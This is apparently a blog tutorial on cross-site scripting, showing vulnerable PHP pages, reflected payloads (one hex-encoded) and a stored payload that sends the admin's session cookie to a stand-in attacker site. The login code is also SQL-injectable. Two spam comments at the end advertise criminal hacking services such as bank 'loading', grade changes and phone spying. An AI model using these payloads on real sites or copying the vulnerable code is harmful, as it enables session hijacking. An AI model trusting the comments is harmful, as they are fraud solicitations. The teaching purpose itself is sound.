In this article we will see a different kind of attack called XXS attacks.
XSS stands for Cross Site Scripting.
XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.
Types of Cross Site Scripting
XSS attacks are broadly classified into 2 types:
- Non-Persistent
- Persistent
1. Non-Persistent XSS Attack
In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.
Example for Non-Persistent XSS
index.php:
<?php $name = $_GET['name']; echo "Welcome $name<br>"; echo "<a href="http://xssattackexamples.com/">Click to Download</a>"; ?>
Example 1:
Now the attacker will craft an URL as follows and send it to the victim:
index.php?name=guest<script>alert('attacked')</script>
When the victim load the above URL into the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.
Example 2:
For example, the attacker can now try to change the “Target URL” of the link “Click to Download”. Instead of the link going to “xssattackexamples.com” website, he can redirect it to go “not-real-xssattackexamples.com” by crafting the URL as shown below:
index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>
In the above, we called the function to execute on “window.onload”. Because the website (i.e index.php) first echos the given name and then only it draws the <a> tag. So if we write directly like the one shown below, it will not work, because those statements will get executed before the <a> tag is echoed
index.php?name=<script>var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com"</script>
Normally an attacker tends not to craft the URL which a human can directly read. So he will encode the ASCII characters to hex as follows.
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
which is same as:
index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>
Now the victim may not know what it is, because directly he cannot understand that the URL is crafted and their is a more chance that he can visit the URL.
2. Persistent XSS Attack
In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.
Session
HTTP protocol is a stateless protocol, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other. But most of the web application don’t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the “Sessions”.
When the user login for the first time, a session ID will be created by the web server and it will be sent to the web-browser as “cookie”. All the sub-sequent request to the web server, will be based on the “session id” in the cookie.
Examples for Persistent XSS Attack
This sample web application we’ve given below that demonstrates the persistent XSS attack does the following:
- There are two types of users: “Admin” and “Normal” user.
- When “Admin” log-in, he can see the list of usernames. When “Normal” users log-in, they can only update their display name.
login.php:
<?php $Host= '192.168.1.8'; $Dbname= 'app'; $User= 'yyy'; $Password= 'xxx'; $Schema = 'test'; $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; /* Connect with database asking for a new connection*/ $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); /* Error checking the connection string */ if (!$Connect) { echo "Database Connection Failure"; exit; } $query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; $result=pg_query($Connect,$query); $row=pg_fetch_array($result,NULL,PGSQL_ASSOC); $user_pass = md5($_POST['pass_word']); $user_name = $row['user_name']; if(strcmp($user_pass,$row['password'])!=0) { echo "Login failed"; } else { # Start the session session_start(); $_SESSION['USER_NAME'] = $user_name; echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>"; } ?>
home.php:
<?php session_start(); if(!$_SESSION['USER_NAME']) { echo "Need to login"; } else { $Host= '192.168.1.8'; $Dbname= 'app'; $User= 'yyy'; $Password= 'xxx'; $Schema = 'test'; $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); if($_SERVER['REQUEST_METHOD'] == "POST") { $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';"; pg_query($Connect,$query); echo "Update Success"; } else { if(strcmp($_SESSION['USER_NAME'],'admin')==0) { echo "Welcome admin<br><hr>"; echo "List of user's are<br>"; $query = "select display_name from $Schema.members where user_name!='admin'"; $res = pg_query($Connect,$query); while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) { echo "$row[display_name]<br>"; } } else { echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">"; echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">"; echo "<input type=\"submit\" value=\"Update\">"; } } } ?>
Now the attacker log-in as a normal user, and he will enter the following in the textbox as his display name:
<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>
The above information entered by the attacker will be stored in the database (persistent).
Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired. The cookie information will be something like the following:
xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3
Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until PHPSESSID expires.
To understand this more, we can use a firefox addon called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3″.
We’ll cover how to use “Tamper Data” in future article of this series.
2 komentari:
The Internet guru delivers a quality service that's qualified for better results to satisfaction of their respective clients and partners. Services provided on the cyber network are :
-Mobile spy application ( Features > Call logs, Location, messages, images emails).
The application allows you spy on targets cell phone.
- Crediting an account (Terms and conditions applied).
- Changing database information.
- Changing school grades .
-Money transfer.
-Activation of firewalls.
- Retrieval of deleted message.
- Identity transformation.
- Repair of credit score.
The services rendered payment are made before delivery of jobs.
Contact: mendaxweev01@gmail.com.
GREAT DEVELOPMENT GOALS ON ONLINE FUNDING ACCOUNTS. (3min read.)
CRYPTOCURRENCY (BITCOIN) underhanded agency. The world's interesting array on financial change you wouldn't ever want to regret missing out on. Here is a global focus fully immersed to a degree that the subject in question Is an highly profitable finance worthwhile experience on merits. The organisation Constructing a long focus on funding your cryptocurrency(bitcoin) wallet with an enormous amounts of coins, including PAYPAL ACCOUNT, ONLINE BANK ACCOUNTS, ATM, and CREDIT CARD LOADING/CREDIT CARD DEPT CLEARANCE. Up a world of unimagined decentralized possibilities, where more online banking funds on value can be built, transferred, and managed with greater ease and transparency via Hacking.
Being a victim of CRYPTOCURRENCY(bitcoin) Funds Mishap prompt our effort on finance cyber scandal focus (CSF). And the most interesting, Bitcoin Wallet Hack Rectification (BWHR), Bitcoin loading, PayPal loading, credit cards/ATM hack.
Firstly,⚠warning!
With money making, scam is a pretty common occurence today. Consumers have to be on a watch at any atrempt on financial fraud. That includes an ultimate addition of insult to injury. Be wary of forgeries who target victim of previous con, luring you in with bogus promises and you can even be charge for actions you could do on your own.
This is a life time transformation with the professionals."
You been trying so hard to meet with the real deal and changing your financial status to a massive ultimate crypto/dollar bill here is where your search ends. There is never a pleasure in been poor.
As a strong and established personnel of cryptocurrency (bitcoin), PayPal, credit card user, in the terms of solid community, we strive to continue our mission on helping Individuals who are facing various cyber problems mostly the bitcoin hack swindles. Good news comes rare and it's left for us to whether cherish such glittering ounce of it like a priceless diamond or the otherwise.
As part of our core mission and value to fix a dysfunctional bitcoin wallet accounts back to it normal stability and increasingly loading different accounts with huge funds via a dominant online crocked cyber tech algorithms. Taking a weighty focus on bitcoin hacks, For instance, wallet account facing problems which incudes.
▪Slack hacking bots,
Fradulent bitcoin minning through brokers
▪Wallet hack,
▪Bitcoin minning pool and exchage hacking,
▪Changing wallet addresses
▪Cryptocurrency theft,
▪Freeze mining on crptocurrency.
Here you are been given a chance to recover what you thought you lost and earnestly making a lot of funds via this highly classified information. This is a global information that navigates a newbie to a prominent encounter. We treat every request with patience and outmost confidence. Basically, hacking requires patience and no funds related successful hack goes lesser than 16 hours. The bottomline is we make a purposeful use of the time in lenience to attain a positive result to our clients.
For our prominent services like Paypal funds loading, credit card dept clearance, credit card loading, website hack, social media hack, and one of the most important is loading up an empty online bank account with huge funds according to the account's capacity, you will all find your deepest longings to be reviewed. It's always like a dream.
The job with the Globalhacks will be a sudden bursts of complete transformative joy and this is reality to your dreams.
For more solid info and help,
Contact:
Cryptobase.hack(at)protonmail(.)com
Globalhacktech(at)protonmail(.)com for proficient services.
AndrewHay©️LLC 2019
Objavi komentar